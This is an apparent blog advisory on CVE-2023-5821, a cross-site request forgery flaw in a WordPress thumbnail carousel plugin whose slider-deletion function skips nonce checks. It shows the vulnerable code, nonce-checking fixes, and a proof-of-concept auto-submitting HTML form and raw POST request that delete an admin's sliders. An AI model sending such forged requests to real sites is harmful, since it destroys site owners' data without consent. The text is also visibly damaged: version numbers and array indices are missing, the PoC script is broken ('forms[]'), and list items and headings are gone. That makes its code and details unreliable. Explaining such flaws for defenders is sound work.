CVE-2023-5821 - How a Missing Nonce in Thumbnail Carousel Slider for WordPress Can Let Attackers Wipe Out Your Sliders

WordPress powers a huge chunk of the web, and plugins make it incredibly flexible. But with great power comes great responsibility—especially for plugin developers. A single missing security check can put entire sites at risk. One recent example is the Cross-Site Request Forgery (CSRF) vulnerability found in the Thumbnail carousel slider plugin, version 1., tracked as CVE-2023-5821.

In this post, we'll break down what happened, why it's dangerous, how it can be exploited, and what you should do about it.

What Exactly Is CVE-2023-5821?

The Thumbnail carousel slider is a WordPress plugin used to create image carousels. In version 1., a function called deleteselected is used to remove sliders via the WordPress admin dashboard.

However, this function doesn't check for a WordPress "nonce." Nonces are special security tokens that help prevent CSRF attacks—where an attacker tricks an admin into doing something they didn't mean to, like deleting all your sliders! Without a nonce check, anyone can send a forged request to this function, and if an admin is logged in and follows a malicious link, it executes.

A missing or improperly implemented security token (nonce verification).

2. An authenticated user's browser making a request they didn't explicitly intend, usually by clicking a link or visiting a page controlled by the attacker.

In our case, the vulnerable code (simplified for clarity) looks something like this

// Vulnerable deleteselected function (simplified example)
function deleteselected() {
    // No nonce check here!
    $ids = $_POST['slider_ids'] ?? [];
    foreach($ids as $id) {
        // Delete each slider with given ID
        delete_slider_by_id($id);
    }
}

A secure function should include a nonce check like this

function deleteselected() {
    // Proper nonce verification
    if (!isset($_POST['my_nonce']) || !wp_verify_nonce($_POST['my_nonce'], 'delete_slider')) {
        die('Security check failed');
    }
    $ids = $_POST['slider_ids'] ?? [];
    foreach($ids as $id) {
        delete_slider_by_id($id);
    }
}

Exploitation Scenario

Let's say Alice is a WordPress admin. She's logged into her site. Bob, a malicious actor, sends Alice an email with a hidden image or button. When Alice clicks the link (or if the image auto-loads), her browser sends a POST request like this without her knowledge:

<form action="https://victim-wordpress-site.com/wp-admin/admin-ajax.php?action=deleteselected"; method="POST">
  <input type="hidden" name="slider_ids[]" value="1">
  <input type="hidden" name="slider_ids[]" value="2">
  <input type="submit" value="Delete All Sliders">
</form>
<script>
  document.forms[].submit();
</script>

Or, as a raw POST (as sent by a malicious script)

POST /wp-admin/admin-ajax.php?action=deleteselected
Content-Type: application/x-www-form-urlencoded

slider_ids[]=1&slider_ids[]=2

When Alice visits Bob's page, her browser sends this request to the vulnerable site. Since she's logged in, the action is performed _as if she had clicked delete herself_—but she never intended to.

Any logged-in admin can be tricked into deleting multiple sliders.

- Attackers only need to send a crafted request, tricking the admin via email, chat, social media, etc.

Why Is the Nonce So Important?

A nonce (Number used once) is a security measure in WordPress that helps prevent CSRF. Every admin action should check a nonce, which is unique per session and action. If a request arrives without the correct nonce, WordPress should block it as it likely didn't originate from the actual admin interface.

In this vulnerability, CVE-2023-5821, the deleteselected function had no such check. This made it easier for attackers to exploit.

Disable or Remove the Plugin. If there's no fix, stop using it right away.

3. Educate Admins: Remind users with admin rights to be cautious with links and emails, especially when logged in.
4. Web Application Firewalls (WAF): Consider WAF rules to block suspicious requests to vulnerable endpoints.

Always check nonces in actions that change data or state!

- Use built-in WordPress functions like check_admin_referer or wp_verify_nonce.

Here's how it should look in your code

function deleteselected() {
    check_admin_referer('delete_slider_action');
    // proceed with deletion...
}

References

- Wordfence advisory on CVE-2023-5821
- WPScan Database entry
- Wikipedia: Cross-Site Request Forgery
- WordPress Nonce Documentation

Conclusion

CVE-2023-5821 is a classic example of how skipping basic security best practices in plugins can endanger WordPress sites. Even a simple nonce check can save your data from being wiped out by a clever attacker. Always keep your plugins updated, review their code for common issues, and remember: Security isn’t just for the big guys. It’s for everyone.


Stay safe, keep updating, and double-check those nonces!

Timeline

Published on: 10/27/2023 12:15:00 UTC
Last modified on: 11/07/2023 04:24:00 UTC